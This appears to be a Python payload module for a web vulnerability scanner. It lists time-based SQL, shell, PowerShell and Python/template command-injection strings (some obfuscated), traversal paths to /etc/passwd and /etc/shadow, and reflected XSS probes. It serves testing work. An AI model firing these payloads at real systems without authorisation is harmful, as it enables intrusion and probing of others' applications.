def bash_time_payloads():
    return [r"sleep 60",
            r"\s\l\e\e\p \6\0",
            r"$(echo -e '\x73\x6C\x65\x65\x70\x20\x36\x30')",
            r"sleep 60 #",
            r"\s\l\e\e\p \6\0 #",
            r"$(echo -e '\x73\x6C\x65\x65\x70\x20\x36\x30') #"]

def directory_traversal_payloads():
    return ["/boot/grub/grub.conf",
            "/etc/passwd",
            "/.gitignore",
            "/etc/shadow",
            "/php.conf",
            "/proc/cpuinfo",
            "/proc/interrupts",
            "/proc/meminfo"]

def emoji_payloads():
    return [r"&#128124;",
            r"&#128293;",
            r"&#128568;",
            r"&#128049;",
            r"&#127814;",
            r"&#x1F47C",
            r"&#x1F525",
            r"&#x1F638",
            r"&#x1F431",
            r"&#x1F346"]

def mssql_time_payloads():
    return [r'WAITFOR DELAY "00:01"',
            r'1 AND WAITFOR DELAY "00:01"',
            r'1 OR WAITFOR DELAY "00:01"',
            r'" 1 AND WAITFOR DELAY "00:01"',
            r"' 1 AND WAITFOR DELAY '00:01'",
            r'" 1 OR WAITFOR DELAY "00:01"',
            r"' 1 OR WAITFOR DELAY '00:01'",
            r'AND WAITFOR DELAY "00:01"',
            r'OR WAITFOR DELAY "00:01"',
            r'" AND WAITFOR DELAY "00:01"',
            r"' OR WAITFOR DELAY '00:01'",
            r'WAITFOR DELAY "00:01" --',
            r'1 AND WAITFOR DELAY "00:01" --',
            r'1 OR WAITFOR DELAY "00:01" --',
            r'" 1 AND WAITFOR DELAY "00:01" --',
            r"' 1 AND WAITFOR DELAY '00:01' --",
            r'" 1 OR WAITFOR DELAY "00:01" --',
            r"' 1 OR WAITFOR DELAY '00:01' --",
            r'AND WAITFOR DELAY "00:01" --',
            r'OR WAITFOR DELAY "00:01" --',
            r'" AND WAITFOR DELAY "00:01" --',
            r"' OR WAITFOR DELAY '00:01' --"]

def mysql_time_payloads():
    return [r"SELECT SLEEP(60);",
            r"1 AND SELECT SLEEP(60);",
            r"1 OR SELECT SLEEP(60);",
            r"' 1 AND SELECT SLEEP(60);",
            r'" 1 AND SELECT SLEEP(60);',
            r"' 1 OR SELECT SLEEP(60);",
            r'" 1 OR SELECT SLEEP(60);',
            r'AND SELECT SLEEP(60);"',
            r'OR SELECT SLEEP(60);',
            r'" AND SELECT SLEEP(60);',
            r"' OR SELECT SLEEP(60);",
            r"SELECT SLEEP(60); --",
            r"1 AND SELECT SLEEP(60); --",
            r"1 OR SELECT SLEEP(60); --",
            r"' 1 AND SELECT SLEEP(60); --",
            r'" 1 AND SELECT SLEEP(60); --',
            r"' 1 OR SELECT SLEEP(60); --",
            r'" 1 OR SELECT SLEEP(60); --',
            r'AND SELECT SLEEP(60);" --',
            r'OR SELECT SLEEP(60); --',
            r'" AND SELECT SLEEP(60); --',
            r"' OR SELECT SLEEP(60); --"]

def oracle_sql_time_payloads():
    return [r"DBMS_LOCK.sleep(60);",
            r"1 AND DBMS_LOCK.sleep(60);",
            r"1 OR DBMS_LOCK.sleep(60);",
            r"' 1 AND DBMS_LOCK.sleep(60);",
            r'" 1 AND DBMS_LOCK.sleep(60);',
            r"' 1 OR DBMS_LOCK.sleep(60);",
            r'" 1 OR DBMS_LOCK.sleep(60);',
            r"DBMS_SESSION.sleep(60);"
            r"1 AND DBMS_SESSION.sleep(60);",
            r"1 OR DBMS_SESSION.sleep(60);",
            r"' 1 AND DBMS_SESSION.sleep(60);",
            r'" 1 AND DBMS_SESSION.sleep(60);',
            r"' 1 OR DBMS_SESSION.sleep(60);",
            r'" 1 OR DBMS_SESSION.sleep(60);',
            r'AND DBMS_LOCK.sleep(60)',
            r'OR DBMS_LOCK.sleep(60)',
            r'" AND DBMS_LOCK.sleep(60)',
            r"' OR DBMS_LOCK.sleep(60)",
            r'AND DBMS_SESSION.sleep(60);',
            r'OR DBMS_SESSION.sleep(60);',
            r'" AND DBMS_SESSION.sleep(60);',
            r"' OR DBMS_SESSION.sleep(60);",
            r"DBMS_LOCK.sleep(60); --",
            r"1 AND DBMS_LOCK.sleep(60); --",
            r"1 OR DBMS_LOCK.sleep(60); --",
            r"' 1 AND DBMS_LOCK.sleep(60); --",
            r'" 1 AND DBMS_LOCK.sleep(60); --',
            r"' 1 OR DBMS_LOCK.sleep(60); --",
            r'" 1 OR DBMS_LOCK.sleep(60); --',
            r"DBMS_SESSION.sleep(60); --"
            r"1 AND DBMS_SESSION.sleep(60); --",
            r"1 OR DBMS_SESSION.sleep(60);--",
            r"' 1 AND DBMS_SESSION.sleep(60); --",
            r'" 1 AND DBMS_SESSION.sleep(60); --',
            r"' 1 OR DBMS_SESSION.sleep(60); --",
            r'" 1 OR DBMS_SESSION.sleep(60); --',
            r'AND DBMS_LOCK.sleep(60) --',
            r'OR DBMS_LOCK.sleep(60) --',
            r'" AND DBMS_LOCK.sleep(60) --',
            r"' OR DBMS_LOCK.sleep(60) --",
            r'AND DBMS_SESSION.sleep(60); --',
            r'OR DBMS_SESSION.sleep(60); --',
            r'" AND DBMS_SESSION.sleep(60); --',
            r"' OR DBMS_SESSION.sleep(60); --"]

def php_time_payloads():
    return [r"sleep(60);",
            r"sleep(60); #"
            r"sleep(60); //"]

def postgresql_time_payloads():
    return [r"pg_sleep(60);",
            r"1 AND pg_sleep(60);",
            r"1 OR pg_sleep(60);",
            r"' 1 AND pg_sleep(60);",
            r'" 1 AND pg_sleep(60);',
            r"' 1 OR pg_sleep(60);",
            r'" 1 OR pg_sleep(60);',
            r"PERFORM pg_sleep(60);",
            r"1 AND PERFORM pg_sleep(60);",
            r"1 OR PERFORM pg_sleep(60);",
            r"' 1 AND PERFORM pg_sleep(60);",
            r'" 1 AND PERFORM pg_sleep(60);',
            r"' 1 OR PERFORM pg_sleep(60);",
            r'" 1 OR PERFORM pg_sleep(60);',
            r"SELECT pg_sleep(60);",
            r"1 AND SELECT pg_sleep(60);",
            r"1 OR SELECT pg_sleep(60);",
            r"' 1 AND SELECT pg_sleep(60);",
            r'" 1 AND SELECT pg_sleep(60);',
            r"' 1 OR SELECT pg_sleep(60);",
            r'" 1 OR SELECT pg_sleep(60);',
            r'AND pg_sleep(60);',
            r'OR pg_sleep(60);',
            r'" AND pg_sleep(60);',
            r"' OR pg_sleep(60);",
            r'AND PERFORM pg_sleep(60);',
            r'OR PERFORM pg_sleep(60);',
            r'" AND PERFORM pg_sleep(60);',
            r"' OR PERFORM pg_sleep(60);",
            r'AND SELECT pg_sleep(60);',
            r'OR SELECT pg_sleep(60);',
            r'" AND SELECT pg_sleep(60);',
            r"' OR SELECT pg_sleep(60);",
            r"pg_sleep(60); --",
            r"1 AND pg_sleep(60); --",
            r"1 OR pg_sleep(60); --",
            r"' 1 AND pg_sleep(60); --",
            r'" 1 AND pg_sleep(60); --',
            r"' 1 OR pg_sleep(60); --",
            r'" 1 OR pg_sleep(60); --',
            r"PERFORM pg_sleep(60); --",
            r"1 AND PERFORM pg_sleep(60); --",
            r"1 OR PERFORM pg_sleep(60); --",
            r"' 1 AND PERFORM pg_sleep(60); --",
            r'" 1 AND PERFORM pg_sleep(60); --',
            r"' 1 OR PERFORM pg_sleep(60); --",
            r'" 1 OR PERFORM pg_sleep(60); --',
            r"SELECT pg_sleep(60); --",
            r"1 AND SELECT pg_sleep(60); --",
            r"1 OR SELECT pg_sleep(60); --",
            r"' 1 AND SELECT pg_sleep(60); --",
            r'" 1 AND SELECT pg_sleep(60); --',
            r"' 1 OR SELECT pg_sleep(60); --",
            r'" 1 OR SELECT pg_sleep(60); --',
            r'AND pg_sleep(60); --',
            r'OR pg_sleep(60); --',
            r'" AND pg_sleep(60); --',
            r"' OR pg_sleep(60); --",
            r'AND PERFORM pg_sleep(60); --',
            r'OR PERFORM pg_sleep(60); --',
            r'" AND PERFORM pg_sleep(60); --',
            r"' OR PERFORM pg_sleep(60); --",
            r'AND SELECT pg_sleep(60); --',
            r'OR SELECT pg_sleep(60); --',
            r'" AND SELECT pg_sleep(60); --',
            r"' OR SELECT pg_sleep(60); --"]

def powershell_payloads():
    return [r"start-sleep -seconds 60",
            r"start-sleep -seconds 60 #"]

def python_reflective_payloads():
    return [r"{{ <script>prompt(1)</script> }}",
            r"{% <script>prompt(1)</script> %}",
            r"return HttpResponse('<script>prompt(1)</script>')",
            r"return render_template('<script>prompt(1)</script>')"]

def python_time_payloads():
    return [r"time.sleep(60)",
            r"__import__('time').sleep(60)",
            r"__import__('os').system('sleep 60')",
            r'eval("__import__(\'time\').sleep(60)")',
            r'eval("__import__(\'os\').system(\'sleep 60\')")',
            r'exec("__import__(\'time\').sleep(60)")',
            r'exec("__import__(\'os\').system(\'sleep 60\')")',
            r'exec("import time\ntime.sleep(60)',
            r'exec("import os\nos.system(\'sleep 60\')")',
            r"time.sleep(60) #",
            r"__import__('os').system('sleep 60') #",
            r'eval("__import__(\'time\').sleep(60)") #',
            r'eval("__import__(\'os\').system(\'sleep 60\')") #',
            r'exec("__import__(\'time\').sleep(60)") #',
            r'exec("__import__(\'os\').system(\'sleep 60\')") #',
            r'exec("import time\ntime.sleep(60) #',
            r'exec("import os\nos.system(\'sleep 60\')") #',
            r"{{ time.sleep(60) }}",
            r"{{ __import__('time').sleep(60) }}",
            r"{{ __import__('os').system('sleep 60') }}",
            r'{{ eval("__import__(\'time\').sleep(60)") }}',
            r'{{ eval("__import__(\'os\').system(\'sleep 60\')") }}',
            r'{{ exec("__import__(\'time\').sleep(60)") }}',
            r'{{ exec("__import__(\'os\').system(\'sleep 60\')") }}',
            r'{{ exec("import time\ntime.sleep(60) }}',
            r'{{ exec("import os\nos.system(\'sleep 60\')") }}',
            r"{{ time.sleep(60) }} #",
            r"{{ __import__('os').system('sleep 60') }} #",
            r'{{ eval("__import__(\'time\').sleep(60)") }} #',
            r'{{ eval("__import__(\'os\').system(\'sleep 60\')") }} #',
            r'{{ exec("__import__(\'time\').sleep(60)") }} #',
            r'{{ exec("__import__(\'os\').system(\'sleep 60\')") }} #',
            r'{{ exec("import time\ntime.sleep(60) }} #',
            r'{{ exec("import os\nos.system(\'sleep 60\')") }} #',
            r"{% time.sleep(60) %}",
            r"{% __import__('time').sleep(60) %}",
            r"{% __import__('os').system('sleep 60') %}",
            r'{% eval("__import__(\'time\').sleep(60)") %}',
            r'{% eval("__import__(\'os\').system(\'sleep 60\')") %}',
            r'{% exec("__import__(\'time\').sleep(60)") %}',
            r'{% exec("__import__(\'os\').system(\'sleep 60\')") %}',
            r'{% exec("import time\ntime.sleep(60 %})',
            r'{% exec("import os\nos.system(\'sleep 60\')") %}',
            r"{% time.sleep(60) %} #",
            r"{% __import__('os').system('sleep 60') %} #",
            r'{% eval("__import__(\'time\').sleep(60)") %} #',
            r'{% eval("__import__(\'os\').system(\'sleep 60\')") %} #',
            r'{% exec("__import__(\'time\').sleep(60)") %} #',
            r'{% exec("__import__(\'os\').system(\'sleep 60\')") %} #',
            r'{% exec("import time\ntime.sleep(60) %} #',
            r'{% exec("import os\nos.system(\'sleep 60\')") %} #',
            r"return render_template(time.sleep(60))",
            r"return render_template(__import__('time').sleep(60))",
            r"return render_template(__import__('os').system('sleep 60'))",
            r'return render_template(eval("__import__(\'time\').sleep(60)"))',
            r'return render_template(eval("__import__(\'os\').system(\'sleep 60\')"))',
            r'return render_template(exec("__import__(\'time\').sleep(60)"))',
            r'return render_template(exec("__import__(\'os\').system(\'sleep 60\')"))',
            r'return render_template(exec("import time\ntime.sleep(60))',
            r'return render_template(exec("import os\nos.system(\'sleep 60\')"))',
            r"return render_template(time.sleep(60)) #",
            r"return render_template(__import__('os').system('sleep 60')) #",
            r'return render_template(eval("__import__(\'time\').sleep(60)")) #',
            r'return render_template(eval("__import__(\'os\').system(\'sleep 60\')")) #',
            r'return render_template(exec("__import__(\'time\').sleep(60)")) #',
            r'return render_template(exec("__import__(\'os\').system(\'sleep 60\')")) #',
            r'return render_template(exec("import time\ntime.sleep(60)) #',
            r'return render_template(exec("import os\nos.system(\'sleep 60\')")) #',
            r"return HttpResponse(time.sleep(60))",
            r"return HttpResponse(__import__('time').sleep(60))",
            r"return HttpResponse(__import__('os').system('sleep 60'))",
            r'return HttpResponse(eval("__import__(\'time\').sleep(60)"))',
            r'return HttpResponse(eval("__import__(\'os\').system(\'sleep 60\')"))',
            r'return HttpResponse(exec("__import__(\'time\').sleep(60)"))',
            r'return HttpResponse(exec("__import__(\'os\').system(\'sleep 60\')"))',
            r'return HttpResponse(exec("import time\ntime.sleep(60))',
            r'return HttpResponse(exec("import os\nos.system(\'sleep 60\')"))',
            r"return HttpResponse(time.sleep(60)) #",
            r"return HttpResponse(__import__('os').system('sleep 60')) #",
            r'return HttpResponse(eval("__import__(\'time\').sleep(60)")) #',
            r'return HttpResponse(eval("__import__(\'os\').system(\'sleep 60\')")) #',
            r'return HttpResponse(exec("__import__(\'time\').sleep(60)")) #',
            r'return HttpResponse(exec("__import__(\'os\').system(\'sleep 60\')")) #',
            r'return HttpResponse(exec("import time\ntime.sleep(60)) #',
            r'return HttpResponse(exec("import os\nos.system(\'sleep 60\')")) #']

def waf_payloads():
    return {"sleep": "sleep",
            "sql": "SELECT",
            "xss": "script"}

def xss_reflective_payloads():
    return [r"<iframe>cobra</iframe>",r"<p>cobra</p>",
            r"<script>alert('cobra')</script>",
            r"<script>prompt('cobra')</script>",
            r"<strong>cobra</strong>",
            r"<style>body{background-color:red;}</style>",
            r"<title>cobra</title>",
            r"' <iframe>cobra</iframe>",
            r"' <p>cobra</p>",
            r"' <script>alert('cobra')</script>",
            r"' <script>prompt('cobra')</script>",
            r"' <strong>cobra</strong>",
            r"' <style>body{background-color:red;}</style>",
            r"' <title>cobra</title>",
            r'" <iframe>cobra</iframe>',
            r'" <p>cobra</p>',
            r'" <script>alert("cobra")</script>',
            r'" <script>prompt("cobra")</script>',
            r'" <strong>cobra</strong>',
            r'" <style>body{background-color:red;}</style>',
            r'" <title>cobra</title>',
            r"'/> <iframe>cobra</iframe>",
            r"'/> <p>cobra</p>",
            r"'/> <script>alert('cobra')</script>",
            r"'/> <script>prompt('cobra')</script>",
            r"'/> <strong>cobra</strong>",
            r"'/> <style>body{background-color:red;}</style>",
            r"'/> <title>cobra</title>",
            r'"/> <iframe>cobra</iframe>',
            r'"/> <p>cobra</p>',
            r'"/> <script>alert("cobra")</script>',
            r'"/> <script>prompt("cobra")</script>',
            r'"/> <strong>cobra</strong>',
            r'"/> <style>body{background-color:red;}</style>',
            r'"/> <title>cobra</title>',
            r"'> <iframe>cobra</iframe>",
            r"'> <p>cobra</p>",
            r"'> <script>alert('cobra')</script>",
            r"'> <script>prompt('cobra')</script>",
            r"'> <strong>cobra</strong>",
            r"'> <style>body{background-color:red;}</style>",
            r"'> <title>cobra</title>",
            r'"> <iframe>cobra</iframe>',
            r'"> <p>cobra</p>',
            r'"> <script>alert("cobra")</script>',
            r'"> <script>prompt("cobra")</script>',
            r'"> <strong>cobra</strong>',
            r'"> <style>body{background-color:red;}</style>',
            r'"> <title>cobra</title>',
            r"/> <iframe>cobra</iframe>",
            r"/> <p>cobra</p>",
            r"/> <script>alert('cobra')</script>",
            r"/> <script>prompt('cobra')</script>",
            r"/> <strong>cobra</strong>",
            r"/> <style>body{background-color:red;}</style>",
            r"/> <title>cobra</title>",
            r"> <iframe>cobra</iframe>",
            r"> <p>cobra</p>",
            r"> <script>alert('cobra')</script>",
            r"> <script>prompt('cobra')</script>",
            r"> <strong>cobra</strong>",
            r"> <style>body{background-color:red;}</style>",
            r"> <title>cobra</title>",
            r"<iframe>cobra</iframe> //",
            r"<p>cobra</p> //",
            r"<script>alert('cobra')</script> //",
            r"<script>prompt('cobra')</script> //",
            r"<strong>cobra</strong> //",
            r"<style>body{background-color:red;}</style> //",
            r"<title>cobra</title> //",
            r"' <iframe>cobra</iframe> //",
            r"' <p>cobra</p> /",
            r"' <script>alert('cobra')</script> //",
            r"' <script>prompt('cobra')</script> //",
            r"' <strong>cobra</strong> //",
            r"' <style>body{background-color:red;}</style> //",
            r"' <title>cobra</title> //",
            r'" <iframe>cobra</iframe> //',
            r'" <p>cobra</p> //',
            r'" <script>alert("cobra")</script> //',
            r'" <script>prompt("cobra")</script> //',
            r'" <strong>cobra</strong> //',
            r'" <style>body{background-color:red;}</style> //',
            r'" <title>cobra</title> //',
            r"'/> <iframe>cobra</iframe> //",
            r"'/> <p>cobra</p> //",
            r"'/> <script>alert('cobra')</script> //",
            r"'/> <script>prompt('cobra')</script> //",
            r"'/> <strong>cobra</strong> //",
            r"'/> <style>body{background-color:red;}</style> //",
            r"'/> <title>cobra</title> //",
            r'"/> <iframe>cobra</iframe> //',
            r'"/> <p>cobra</p> //',
            r'"/> <script>alert("cobra")</script> //',
            r'"/> <script>prompt("cobra")</script> //',
            r'"/> <strong>cobra</strong> //',
            r'"/> <style>body{background-color:red;}</style> //',
            r'"/> <title>cobra</title> //',
            r"'> <iframe>cobra</iframe> //",
            r"'> <p>cobra</p> //",
            r"'> <script>alert('cobra')</script> //",
            r"'> <script>prompt('cobra')</script> //",
            r"'> <strong>cobra</strong> //",
            r"'> <style>body{background-color:red;}</style> //",
            r"'> <title>cobra</title> //",
            r'"> <iframe>cobra</iframe> //',
            r'"> <p>cobra</p> //',
            r'"> <script>alert("cobra")</script> //',
            r'"> <script>prompt("cobra")</script> //',
            r'"> <strong>cobra</strong> //',
            r'"> <style>body{background-color:red;}</style> //',
            r'"> <title>cobra</title> //',
            r"/> <iframe>cobra</iframe> //",
            r"/> <p>cobra</p> //",
            r"/> <script>alert('cobra')</script> //",
            r"/> <script>prompt('cobra')</script> //",
            r"/> <strong>cobra</strong> //",
            r"/> <style>body{background-color:red;}</style> //",
            r"/> <title>cobra</title> //",
            r"> <iframe>cobra</iframe> //",
            r"> <p>cobra</p> //",
            r"> <script>alert('cobra')</script> //",
            r"> <script>prompt('cobra')</script> //",
            r"> <strong>cobra</strong> //",
            r"> <style>body{background-color:red;}</style> //",
            r"> <title>cobra</title> //",
            r"<iframe>cobra</iframe> <!--",
            r"<p>cobra</p> <!--",
            r"<script>alert('cobra')</script> <!--",
            r"<script>prompt('cobra')</script> <!--",
            r"<strong>cobra</strong> <!--",
            r"<style>body{background-color:red;}</style> <!--",
            r"<title>cobra</title> <!--",
            r"' <iframe>cobra</iframe> <!--",
            r"' <p>cobra</p> <!--",
            r"' <script>alert('cobra')</script> <!--",
            r"' <script>prompt('cobra')</script> <!--",
            r"' <strong>cobra</strong> <!--",
            r"' <style>body{background-color:red;}</style> <!--",
            r"' <title>cobra</title> <!--",
            r'" <iframe>cobra</iframe> <!--',
            r'" <p>cobra</p> <!--',
            r'" <script>alert("cobra")</script> <!--',
            r'" <script>prompt("cobra")</script> <!--',
            r'" <strong>cobra</strong> <!--',
            r'" <style>body{background-color:red;}</style> <!--',
            r'" <title>cobra</title> <!--',
            r"'/> <iframe>cobra</iframe> <!--",
            r"'/> <p>cobra</p> <!--",
            r"'/> <script>alert('cobra')</script> <!--",
            r"'/> <script>prompt('cobra')</script> <!--",
            r"'/> <strong>cobra</strong> <!--",
            r"'/> <style>body{background-color:red;}</style> <!--",
            r"'/> <title>cobra</title> <!--",
            r'"/> <iframe>cobra</iframe> <!--',
            r'"/> <p>cobra</p> <!--',
            r'"/> <script>alert("cobra")</script> <!--',
            r'"/> <script>prompt("cobra")</script> <!--',
            r'"/> <strong>cobra</strong> <!--',
            r'"/> <style>body{background-color:red;}</style> <!--',
            r'"/> <title>cobra</title> <!--',
            r"'> <iframe>cobra</iframe> <!--",
            r"'> <p>cobra</p> <!--",
            r"'> <script>alert('cobra')</script> <!--",
            r"'> <script>prompt('cobra')</script> <!--",
            r"'> <strong>cobra</strong> <!--",
            r"'> <style>body{background-color:red;}</style> <!--",
            r"'> <title>cobra</title> <!--",
            r'"> <iframe>cobra</iframe> <!--',
            r'"> <p>cobra</p> <!--',
            r'"> <script>alert("cobra")</script> <!--',
            r'"> <script>prompt("cobra")</script> <!--',
            r'"> <strong>cobra</strong> <!--',
            r'"> <style>body{background-color:red;}</style> <!--',
            r'"> <title>cobra</title> <!--',
            r"/> <iframe>cobra</iframe> <!--",
            r"/> <p>cobra</p> <!--",
            r"/> <script>alert('cobra')</script> <!--",
            r"/> <script>prompt('cobra')</script> <!--",
            r"/> <strong>cobra</strong> <!--",
            r"/> <style>body{background-color:red;}</style> <!--",
            r"/> <title>cobra</title> <!--",
            r"> <iframe>cobra</iframe> <!--",
            r"> <p>cobra</p> <!--",
            r"> <script>alert('cobra')</script> <!--",
            r"> <script>prompt('cobra')</script> <!--",
            r"> <strong>cobra</strong> <!--",
            r"> <style>body{background-color:red;}</style> <!--",
            r"> <title>cobra</title> <!--"]
